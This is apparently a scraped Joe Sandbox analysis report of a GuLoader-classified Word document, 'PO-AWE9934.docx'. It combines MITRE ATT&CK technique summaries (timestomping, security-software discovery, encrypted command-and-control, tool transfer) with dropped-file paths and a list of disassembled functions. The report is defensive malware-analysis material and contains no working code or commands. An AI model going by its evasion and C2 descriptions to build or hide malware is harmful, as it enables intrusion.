Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-AWE9934.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits

System Summary

Jbx Signature Overview

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A7237623-5E03-4814-94FE-7F3CA262EA81}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D52C8A6F-38F1-4102-9EE5-ECDCF6278B29}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dhl_shp[1].wbk

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DCC5A3.wbk

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF71696C-9FFE-4094-80B8-5D87621A22A7}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C73D7E24-0695-475A-9EE3-0951BA4BA5FE}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp

C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll

C:\Users\user\AppData\Local\Temp\racehorse.dat

Windows Analysis Report
PO-AWE9934.docx

Function 0040352D Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 73281BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 03699C2E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208
memorynativeCOMMON

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BEC Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON